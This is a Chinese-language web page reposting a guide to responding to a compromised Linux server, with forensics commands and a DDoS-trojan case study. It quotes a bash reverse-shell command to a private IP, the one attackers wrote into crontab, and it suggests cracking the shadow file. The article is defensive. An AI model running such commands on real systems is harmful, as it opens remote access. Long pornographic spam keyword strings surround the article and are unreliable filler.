久久综合给合久久,色偷偷久久9999kkkk,欧美阿V大胆视频在线观看,99久久精品免费看国产一区二

服務(wù)熱線

020-38921330

首頁 > 新聞資訊 > 行業(yè)新聞

年關(guān)將至,服務(wù)器被入侵了怎么辦?

2018-1-30 0:00:00瀏覽量:1329編輯:管理員來源:天暢

到服務(wù)器被黑,很多人會采用拔網(wǎng)線、封 iptables 或者關(guān)掉所有服務(wù)的方式應(yīng)急,但如果是線上服務(wù)器就不能立即采用任何影響業(yè)務(wù)的手段了,需要根據(jù)服務(wù)器業(yè)務(wù)情況分類處理。

下面我們看一個標(biāo)準(zhǔn)的服務(wù)器安全應(yīng)急影響應(yīng)該怎么做,也算是筆者從事安全事件應(yīng)急近 6 年以來的一些經(jīng)驗之談,借此拋磚引玉,希望大神們不吝賜教。

圖 1:處理思路

如上圖,將服務(wù)器安全應(yīng)急響應(yīng)流程分為如下 8 個環(huán)節(jié):

  • 發(fā)現(xiàn)安全事件(核實)
  • 現(xiàn)場保護(hù)
  • 服務(wù)器保護(hù)
  • 影響范圍評估
  • 在線分析
  • 數(shù)據(jù)備份
  • 深入分析
  • 事件報告整理

接下來我們將每個環(huán)節(jié)分解,看看需要如何斷開異常連接、排查入侵源頭、避免二次入侵等。

核實信息(運維/安全人員)

根據(jù)安全事件通知源的不同,分為兩種:

  • 外界通知:和報告人核實信息,確認(rèn)服務(wù)器/系統(tǒng)是否被入侵?,F(xiàn)在很多企業(yè)有自己的 SRC(安全響應(yīng)中心),在此之前更多的是依賴某云。這種情況入侵的核實一般是安全工程師完成。
  • 自行發(fā)現(xiàn):根據(jù)服務(wù)器的異常或故障判斷,比如對外發(fā)送大規(guī)模流量或者系統(tǒng)負(fù)載異常高等,這種情況一般是運維工程師發(fā)現(xiàn)并核實的。

現(xiàn)場保護(hù)(運維)

我們很多人看過大陸的電視劇《重案六組》,每次接到刑事案件,刑警們第一時間就是封鎖現(xiàn)場、保存現(xiàn)場原狀。

同樣道理,安全事件發(fā)生現(xiàn)場,跟刑事案件發(fā)生現(xiàn)場一樣,需要保存第一現(xiàn)場重要信息,方便后面入侵檢測和取證。

保存現(xiàn)場環(huán)境(截圖)

相關(guān)信息采集命令如下:

  • 進(jìn)程信息:ps axu
  • 網(wǎng)絡(luò)信息:netstat –a
  • 網(wǎng)絡(luò)+進(jìn)程:lsof / netstat -p

攻擊者登陸情況(截圖)

相關(guān)信息采集命令如下:

  • 查看當(dāng)前登錄用戶:w 或 who -a

服務(wù)器保護(hù)(運維/機(jī)房)

這里的現(xiàn)場保護(hù)和服務(wù)器保護(hù)是兩個不同的環(huán)節(jié),前者注重取證,后者注重環(huán)境隔離。

核實機(jī)器被入侵后,應(yīng)當(dāng)盡快將機(jī)器保護(hù)起來,避免被二次入侵或者當(dāng)成跳板擴(kuò)大攻擊面。

此時,為保護(hù)服務(wù)器和業(yè)務(wù),避免服務(wù)器被攻擊者繼續(xù)利用,應(yīng)盡快遷移業(yè)務(wù),立即下線機(jī)器。

如果不能立即處理,應(yīng)當(dāng)通過配置網(wǎng)絡(luò) ACL 等方式,封掉該服務(wù)器對網(wǎng)絡(luò)的雙向連接。

影響范圍評估(運維/開發(fā))

一般是運維或者程序確認(rèn)影響范圍,需要運維通過日志或者監(jiān)控圖表確認(rèn)數(shù)據(jù)庫或者敏感文件是否泄露,如果是代碼或者數(shù)據(jù)庫泄露了,則需要程序評估危害情況與處置方法。

影響訪問評估一般從下面幾點來入手:

  • 具體業(yè)務(wù)架構(gòu):Web(PHP/Java, WebServer), Proxy, DB等。
  • IP 及所處區(qū)域拓?fù)涞?/strong>:VLAN 內(nèi)服務(wù)器和應(yīng)用情況。
  • 確定同一網(wǎng)絡(luò)下面服務(wù)器之間的訪問:可以互相登陸,是否需要 Key 或者是密碼登錄。

由此確定檢查影響范圍,確認(rèn)所有受到影響的網(wǎng)段和機(jī)器。

在線分析(安全人員/運維)

這時需要根據(jù)個人經(jīng)驗快速在線分析,一般是安全人員和運維同時在線處理,不過會涉及多人協(xié)作的問題,需要避免多人操作機(jī)器時破壞服務(wù)器現(xiàn)場,造成分析困擾。

之前筆者遇到一個類似的問題,就是運維排查時敲錯了 iptables 的命令,將 iptables -L 敲成 iptables -i 導(dǎo)致 iptables-save 時出現(xiàn)異常記錄,結(jié)果安全人員上來檢查時就被這條記錄迷惑了,導(dǎo)致處理思路受到一定干擾。

所有用戶 History 日志檢測

  • 關(guān)鍵字:wget/curl, gcc, 或者隱藏文件, 敏感文件后綴(.c,.py,conf, .pl, .sh)。
  • 檢查是否存在異常用戶。
  • 檢查最近添加的用戶,是否有不知名用戶或不規(guī)范提權(quán)。
  • 找出 root 權(quán)限的用戶。

可以執(zhí)行以下命令檢查:

  1. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 

反連木馬判斷

  • netstat –a
  • 注意非正常端口的外網(wǎng) IP

可疑進(jìn)程判斷

  • 判斷是否為木馬 ps –aux
  • 重點關(guān)注文件(隱藏文件), Python腳本,Perl腳本,Shell 腳本(bash/sh/zsh)。
  • 使用 which,whereis,find 定位。

Crontab 檢測

不要用 crontab –l 查看 crontab(繞過檢測),也有通過寫 crontab 配置文件反彈Shell 的,筆者接觸過幾次,一般都是使用的 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1。

系統(tǒng)日志檢測

  • 檢查 sshd 服務(wù)配置文件 /etc/ssh/sshd_config 和系統(tǒng)認(rèn)證日志 auth、message,判斷是否為口令破解攻擊。
  • /etc/ssh/sshd_config 文件確認(rèn)認(rèn)證方式。
  • 確認(rèn)日志是否被刪除或者清理過的可能(大小判斷)。
  • last/lastb 可以作為輔助,不過可能不準(zhǔn)確。

NHIDS 正常運行判斷

  • 是否安裝:ls /etc/ossec
  • 是否運行正常:ps axu |grep nhids,三個 nhids 進(jìn)程則表示正常

其他攻擊分析

抓取網(wǎng)絡(luò)數(shù)據(jù)包并進(jìn)行分析,判斷是否為拒絕服務(wù)攻擊,這里需要注意,一定要使用 -w 參數(shù),這樣才能保存成 pcap 格式導(dǎo)入到 wireshark,這樣分析起來會事半功倍。

  1. tcpdump -w tcpdump.log 

安全相關(guān)的關(guān)鍵文件和數(shù)據(jù)備份(運維)

可以同步進(jìn)行,使用 sftp/rsync 等將日志上傳到安全的服務(wù)器:

  • 打包系統(tǒng)日志:參考:$ tar -jcvf syslog.tar.bz2 /var/log
  • 打包 Web 日志:access log
  • 打包 History 日志(所有用戶),參考:$ cp /home/user/,history user_history
  • 打包 crontab 記錄
  • 打包密碼文件:/etc/passwd, /etc/shadow
  • 打包可疑文件、后門、Shell 信息

深入分析(安全人員)

初步鎖定異常進(jìn)程和惡意代碼后,將受影響范圍梳理清楚,封禁了入侵者對機(jī)器的控制后,接下來需要深入排查入侵原因。一般可以從 Webshell、開放端口服務(wù)等方向順藤摸瓜。

Webshell 入侵

  • 使用 Webshell_check.py 腳本檢測 Web 目錄:
  1. $ python webshell_check.py /var/www/ >result.txt 
  • 查找 Web 目錄下所有 nobody 的文件,人工分析:
  1. $ find /var/www –user nobody >nobody.txt 
  • 如果能確定入侵時間,可以使用 find 查找最近時間段內(nèi)變化的文件:
  1. $ find / -type f -name "\.?*" |xargs ls -l |grep "Mar 22" 
  2. $ find / -ctime/-mtime 8 

利用 Web 漏洞直接反連 Shell

分析 access.log:

  • 縮小日志范圍:時間,異常 IP 提取。
  • 攻擊行為提取:常見的攻擊 exp 識別。

系統(tǒng)弱口令入侵

認(rèn)證相關(guān)日志 auth/syslog/message 排查:

  • 爆破行為定位和 IP 提取。
  • 爆破是否成功確定:有爆破行為 IP 是否有 accept 記錄。

如果日志已經(jīng)被清理,使用工具(比如John the Ripper)爆破 /etc/passwd,/etc/shadow。

其他入侵

其他服務(wù)器跳板到本機(jī)。

后續(xù)行為分析

History 日志:提權(quán)、增加后門,以及是否被清理。

Sniffer:網(wǎng)卡混雜模式檢測  ifconfig |grep –i proc。

內(nèi)網(wǎng)掃描:網(wǎng)絡(luò) nmap/ 掃描器,socks5 代理。

確定是否有 rootkit:rkhunter, chkrootkit, ps/netstat 替換確認(rèn)。

后門清理排查

根據(jù)時間點做關(guān)聯(lián)分析:查找那個時間段的所有文件。

一些小技巧:/tmp 目錄, ls –la,查看所有文件,注意隱藏的文件。

根據(jù)用戶做時間關(guān)聯(lián):比如 nobody。

其他機(jī)器的關(guān)聯(lián)操作

其他機(jī)器和這臺機(jī)器的網(wǎng)絡(luò)連接 (日志查看)、相同業(yè)務(wù)情況(同樣業(yè)務(wù),負(fù)載均衡)。

整理事件報告(安全人員)

事件報告應(yīng)包含但不限于以下幾個點:

  • 分析事件發(fā)生原因:事件為什么會發(fā)生的原因。
  • 分析整個攻擊流程:時間點、操作。
  • 分析事件處理過程:整個事件處理過程總結(jié)是否有不足。
  • 分析事件預(yù)防:如何避免事情再次發(fā)生。
  • 總結(jié):總結(jié)事件原因,改進(jìn)處理過程,預(yù)防類似事件再次發(fā)生。

處理中遇到的比較棘手的事情

日志和操作記錄全被刪了,怎么辦?

strace 查看 losf 進(jìn)程,再嘗試恢復(fù)一下日志記錄,不行的話鏡像硬盤數(shù)據(jù)慢慢查。這個要用到一些取證工具了,dd 硬盤數(shù)據(jù)再去還原出來。

系統(tǒng)賬號密碼都修改了,登不進(jìn)去?

重啟進(jìn)單用戶模式修改 root 密碼,或者通過控制卡操作,或者直接還原系統(tǒng),都搞不定就直接重裝吧。

使用常見的入侵檢測命令未發(fā)現(xiàn)異常進(jìn)程,但是機(jī)器在對外發(fā)包,這是怎么回事?

這種情況下很可能常用的系統(tǒng)命令已經(jīng)被攻擊者或者木馬程序替換,可以通過 md5sum 對比本機(jī)二進(jìn)制文件與正常機(jī)器的 md5 值是否一致。

如果發(fā)現(xiàn)不一致,肯定是被替換了,可以從其他機(jī)器上拷貝命令到本機(jī)替換,或者 alias 為其他名稱,避免為惡意程序再次替換。

被 getshell 怎么辦?

  • 漏洞修復(fù)前,系統(tǒng)立即下線,用內(nèi)網(wǎng)環(huán)境訪問。
  • 上傳點放到內(nèi)網(wǎng)訪問,不允許外網(wǎng)有類似的上傳點,有上傳點,而且沒有校驗文件類型很容易上傳 Webshell。
  • 被 getshell 的服務(wù)器中是否有敏感文件和數(shù)據(jù)庫,如果有請檢查是否有泄漏。
  • hosts 文件中對應(yīng)的 host 關(guān)系需要重新配置,攻擊者可以配置 hosts 來訪問測試環(huán)境。
  • 重裝系統(tǒng)。

案例分析

上面講了很多思路的東西,相信大家更想看看實際案例,下面介紹兩個案例。

案例 1

一個別人處理的案例,基本處理過程如下:

通過外部端口掃描收集開放端口信息,然后獲取到反彈 Shell 信息,登陸機(jī)器發(fā)現(xiàn)關(guān)鍵命令已經(jīng)被替換,后面查看 History 記錄,發(fā)現(xiàn)疑似木馬文件,通過簡單逆向和進(jìn)程查看發(fā)現(xiàn)了異常進(jìn)程,從而鎖定了入侵原因。

具體內(nèi)容可以查看:http://www.freebuf.com/articles/system/50728.html

案例 2

一個筆者實際處理過的案例,基本處理流程跟上面提到的思路大同小異。

整個事情處理經(jīng)過大致如下:

1、運維發(fā)現(xiàn)一臺私有云主機(jī)間歇性的對外發(fā)送高達(dá) 800Mbps 的流量,影響了同一個網(wǎng)段的其他機(jī)器。

2、安全人員接到通知后,先確認(rèn)了機(jī)器屬于備機(jī),沒有跑在線業(yè)務(wù),于是通知運維封禁 iptables 限制外網(wǎng)訪問。

3、運維為安全人員臨時開通機(jī)器權(quán)限,安全人員通過 History 和 ps 找到的入侵記錄和異常進(jìn)程鎖定了對外大量發(fā)包的應(yīng)用程序,清理了惡意進(jìn)程并刪除惡意程序。

惡意進(jìn)程如下,經(jīng)過在網(wǎng)絡(luò)搜索發(fā)現(xiàn)是一種 DDOS 木馬,但沒有明確的處理思路:

  1. /usr/bin/bsd-port/getty/usr/bin/acpid./dbuspm-session /sbin/DDosClient RunByP4407/sbin/DDosClient RunByPM4673 

處理過程中,安全人員懷疑系統(tǒng)文件被替換,通過對比該機(jī)器與正常機(jī)器上面的 ps、netstat 等程序的大小發(fā)現(xiàn)敏感程序已經(jīng)被替換,而且 mtime 也被修改。

正常機(jī)器:

  • du -sh /bin/ps
  • 92K /bin/ps
  • du -sh /bin/netstat
  • 120K    /bin/netstat

被入侵機(jī)器:

  • du -sh /bin/netstat
  • 2.0M    /bin/netstat
  • du -sh /bin/ps
  • 2.0M    /bin/ps

將部分常用二進(jìn)制文件修復(fù)后,發(fā)現(xiàn)異常進(jìn)程被 kill 掉后仍重啟了,于是安裝殺毒軟件 clamav 和 rootkit hunter 進(jìn)行全盤掃描。

從而確認(rèn)了被感染的所有文件,將那些可以刪除的文件刪除后再次 kill 掉異常進(jìn)程,則再沒有重啟的問題。

4、影響范圍評估

由于該機(jī)器只是備機(jī),上面沒有敏感數(shù)據(jù),于是信息泄露問題也就不存在了。

掃描同一網(wǎng)段機(jī)器端口開放情況、排查被入侵機(jī)器 History 是否有對外掃描或者入侵行為,為此還在該網(wǎng)段機(jī)器另外部署蜜罐進(jìn)行監(jiān)控。

5、深入分析入侵原因

通過被入侵機(jī)器所跑服務(wù)、iptables 狀態(tài),確認(rèn)是所跑服務(wù)支持遠(yuǎn)程命令執(zhí)行。

并且機(jī)器 iptables 為空導(dǎo)致黑客通過往 /etc/crontab 中寫“bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”命令方式進(jìn)行 Shell 反彈,從而入侵了機(jī)器。

6、驗證修復(fù)、機(jī)器下線重裝

進(jìn)行以上修復(fù)操作后,監(jiān)控未發(fā)現(xiàn)再有異常,于是將機(jī)器下線重裝。

7、完成安全事件處理報告

每次安全事件處理后,都應(yīng)當(dāng)整理成報告,不管是知識庫的構(gòu)建,還是統(tǒng)計分析安全態(tài)勢,都是很有必要的。

這次主要介紹了服務(wù)器被入侵時推薦的一套處理思路。實際上,安全防護(hù)跟運維思路一樣,都是要防患于未然,這時候的審計或者響應(yīng)很難避免危害的發(fā)生了。

我們更希望通過安全意識教育、安全制度的建設(shè),在問題顯露端倪時即可消弭于無形。



亚洲欧洲日产国码高潮av 亚洲 校园 小说 中文字幕 老熟女五十路乱子交尾中出 欧美日韩一区二区精品在线免费看 欧美乱妇高清免费96欧美乱妇高清 激情伊人五月天久久综合 色天使精品国产呦系列在线观看 99爱在线精品免费观看 亚洲欧美在线不卡 久久精品2021国产不卡 久久精品免费看国产一区二区三区 在线精品亚洲欧洲第一页 日本日本乱码伦视频在线观看 日本ā片免费观看网站一区二区三 疯狂的欧美乱大交另类 2021国产精品另类小说 国产波霸一区二区 2021天天做夜夜爽网站 欧美性wwoo 911国产自产精品a 日本欧美成年奭片免费观看 亚洲乱码一区二区三区 91在线精品麻豆欧美在线 俺来也俺去啦久久综合网 极限潮喷欧美cytherehd 一卡2卡3卡4卡国色天香九零 国产人人一区二区三区 国产va在线观看 国产一级特黄高清大片多人pk 一区二区三区四区亚洲风情推销员 国产原创自拍不卡第一页 天天摸日日添狠狠添婷婷 国产综合50p热6久精品国产首页 第一页老司机亚洲精品 刘玥91精选国产在线观看 国日本久久欲网969aacom 欧美变态口味重另类在线视频 欧洲精品一区二区三区在线播放 中文字幕亚洲综合 2021国产三级四虎永久在线精品免费 欧美亚日韩精品影视 国产精品一区12p 一区二区三区免费视频日韩在线不卡 精品国产8844aa 日本大乳奶水奶水春日在线观看 中文字幕一区二区 亚洲欧美日韩在线一区 久久精品一品道久久精品 国产尤物亚洲精品 国产系列丝袜熟女 欧美精品v国产精品v日韩精品 欧洲精品一区二区三区在线 91桃色午夜福利国产在线观看 国产一区二区三区 华人欧美整片ptv海量 欧美日韩视频在线第一区 热6久精品国产首页 老鸭窝亚洲欧美国产日韩在线 国产第一页国产 另类亚洲综合区图片小说 欧美bangbros免费 亚洲一区小说区中文 亚洲а∨天堂久久精品 国产高清综合乱色视 亚洲系列 中文字幕 久久国产综合精品尤物 一区二区三区 欧美在线小说区a人亚洲成a 亚洲а∨天堂久久精品ppypp 青草国产在线视频中文字幕 亚洲永久免费播放 尤物在线257国产精品baoyutv 精品精品国产理论在线 尹人香蕉久久99天天拍欧美p7 中中文字幕亚洲无线码 伊人久久香线综合 在线精品8热视频国产九九九 国产白袜男GayChina 色丁狠狠桃花久久综合网 久久996re热这里有 欧美另类久久久精品图片 天天爽夜夜爽欧美日韩一区二 999国产精品永久免费 日本秋霞免费午 结衣一区二区 免费一本色道久久一区熟 国产私拍精品名人第一页 欧美人妖ZZZOOO 亚洲女人自熨在线视频 青青在线精品2019 欧美一级艳片欧美精品 精品免费看国产一区二区 欧美精品九九99久久在免费线 色香天天综合网天天来吧 欧洲精品一区二区三区在线播放 6国产精品免费视频 男同TWING蜜芽久久人人爱香蕉 92精品国产自产在线 99精品众筹模特私拍 97人洗澡人人澡人人模 女人喷潮一区二区视频 欧美性猛片XXXXX免费 欧美日韩一卡2卡3卡4卡 精品欧洲男同同性videoshothouse 亚洲gv永久天堂网亚洲 99久久精品国产免费看 久久综合久久综合九色 国产思思99RE99在线观看 亚洲欧美在线不卡 99r只有精品高清6 国产精品无在线观看 欧美孕交vivoestv另类 国产163黄页网 亚洲网站国产人免费人成免费视频 337P日本欧洲亚洲大胆艺术 欧美日韩精品久久 亚洲二区小说激情 欧美综合亚洲日韩精品区 国产新人36D在线观看 夜夜天天噜国产午夜福利院757视频 欧美久久精品免费 亚洲日产中文字幕泳池 欧美同性无套高清gayroom 中文久久网久久综合国产 国产精品99久猫咪 3353亚洲欧美日韩综合 狠狠看穞片天天国产真人 动漫精品中文字幕制服一区 欧美∨ideosdesexo孕妇 99r只有精品高清6 国产欧美va欧美va香蕉 国产在线观看在 亚洲Av中文字幕色本草 国产精品日日摸夜夜添夜夜添 色天使精品国产呦系列在线观看 日韩欧美国产一中文字暮精品 日本按摩高潮a级中文片 又大又粗又长又硬好爽 国产成a人片在线观看视频 亚洲91在线97 欧美色在线观看69视频一区二区 亚洲八十八页 在线播放 911亚洲国产自产 亚洲仑片欧美仑片 国产精品VA在线观看丝瓜影院 日本小说视频 最新国产偷倩在线播放 欧美三级正品蓝导航收录最面的 国产精品99久久99久久久不卡 久久嫩草影院免费看夜色 亚洲国产区中文 国产精品每日更新在线观看 国产女人18水真多18精品 wele日本最新免费不卡二区 丝袜美腿亚洲一区二区 奇米影视四色娱乐一区 亚洲欧美制服在线88p 国产精品亚洲А∨天堂网 欧美日韩国产的视频yw885 日韩欧美另类第八页 亚洲另类专区制服91人碰人人添 伊人久久不日韩视频9588精品Ⅴ 天天躁日日躁狼狼97 日本妇人成熟免费中文字幕久久 精品欧美日产幕乱码2021 精品熟女少妇av免费 亚洲欧美另类图片久伊色 91caoporon国产 亚洲大成色WWW永久网站动图 国产片av国语在线观看手机版 国产精品精品自在线拍 99久久精品免费观看国产 欧美肉交20P 国产小u女在线未发育 国产精品专区第二 国产人人一区二区三区 夜夜爽88888视频免费看 日韩欧美亚洲每日更新在线 麻豆果冻传媒精品国产苹果 香港AA三级久久三级 9l国产精品麻豆 亚洲日韩欧美综合第十页 偷自拍亚洲精品偷一 国产精品99久猫咪 99久久综合国产二区高清闺蜜 99j久久精品久 快速亚洲另类在线一区swag 亚洲综合小综合在线 粉嫩虎白妞流白浆无遮挡久久久 首页精品亚洲五月天 亚洲Av有声小说一区二区 中文字幕婷婷日韩欧美 亚洲综合图片专区150p 欧美∨ideosdesexo孕妇 国产在线91精品资源 欧美乱妇高清无乱码在线观看 97人人社区2022精品久中文字幕 大伊香蕉精品一区二区免费国产片高 性欧美乱妇高清COME 亚洲欧美性都花花世界 日韩国产综合精选 殴美一区二区三区a级日韩精品 性色AV一区二区三区V视界影院 国产AV夜夜欢一区二区三区 国产网红直播造人在线播放影院 久久综合精品国产丝袜长腿 国产精品亚洲精品 91精品国产国语大全 欧美13一14娇小xxxx 亚洲精品久久综合国产小说 亚洲另类专区 国产在线精品一区二区 久久天神马影院 Jizz4国产热门精品水多99精品久久久 亚洲综合憿情五月网日本三级本道在线播放 精品国产精品亚洲艾草网 AV一区二区乱子伦 色悠综合网国产 国产小受18asian男男a中文字幕久久 欧美贵妇xxxxxbbbb 99爱在线精品免费观看 亚洲狼窝一二三四欧美亚洲美日更新在线 欧美乱妇高清免费96欧美乱妇 xxx黄区免费 久久婷婷大香萑太香蕉av 精品国产自在久国产 欧美精品亚洲精品日韩已满十八 动漫精品中文字幕制服一区 国产又黄又潮娇喘视频 日韩欧美亚洲每日更新 亚洲精品免费视频 久久久亚洲裙底偷窥综合 一区二区免费视亚洲中文av永久主页不卡 日韩中亚欧美美日更新 精品二区制服师生欧美亚洲 中文字幕一区二区精品区 国产精品柳州莫菁69影院 一区二区三区免费视频 城市久久亚洲另类小说 国产2021中文天码字幕 2020高清一道国产 欧洲自拍另类欧美综合图片 精品亚洲一区二区三区在线 亚洲乱亚洲乱妇国产36p 日本www免费视频9a1111欧美精品aaaa 久久91仙踪林色妞www 亚洲欧美乱综合图片区小说区 亚洲成a人片777777 日本一本区又大又粗啊啊啊啊欧美 亚洲国产第一站精品蜜芽 精品国产一区色哟哟精一区二区 久久天天综线观看 一个人看的免费高清WWW视频 久久久精品免费 久久精品亚洲熟女 danbobo.com 欧美ⅴA亚洲VA在线久久人人片aV 国产美女精品久久久 97精品一区二区三区香蕉 久久狼人大香伊蕉国产下载 欧洲亚洲AV一品道 欧美aiexisfawx 青青久久伊人狼友网站 免费久久99精品国产自在现 伊人成亚洲综合人网7777 伊人久久大香线欧美 高清a阿V天堂亚洲阿∨天堂在线 日本乱偷中文字幕 亚洲图片小说激情综合 91caoporon欧美香蕉 日本娇小枯瘦XXXX欧美v亚洲vrihanv在线 人成网线在线播放国产精品嫩草2 精品俞拍视频支架DJ国产一卡二卡三卡 heyzo一本久久综合亚洲 337p日本大胆欧美人术 城市久久亚洲另类小说 青青国产揄拍视频在线观看 精品福利一区二区 A级国产乱理伦片 国产乱子伦午夜 亚洲成色在线综合网站2018 亚洲综合日韩一区福 91麻豆精品国产自产在线 亚洲Av有声小说一区二区 hh99me国产 高潮一区二区 国产尤物亚洲精品不卡 99精品众筹模特自拍视频 韩国精品福利一区二区三区 欧美色欧美亚洲另类二区 亚洲系列 中文字幕 青青久久欧美大黑资源 国产精品久久福利新婚之夜 国产剧情演绎系列丝袜高跟 亚洲乱理伦片在线观看 精品BBBBB性XXXXXA 日本一本区又大又粗啊啊啊啊欧美 2021国产精品自产拍在线 亚洲精品狼友在线播放 亚洲中文字幕在线导航 国产美女爽到喷出水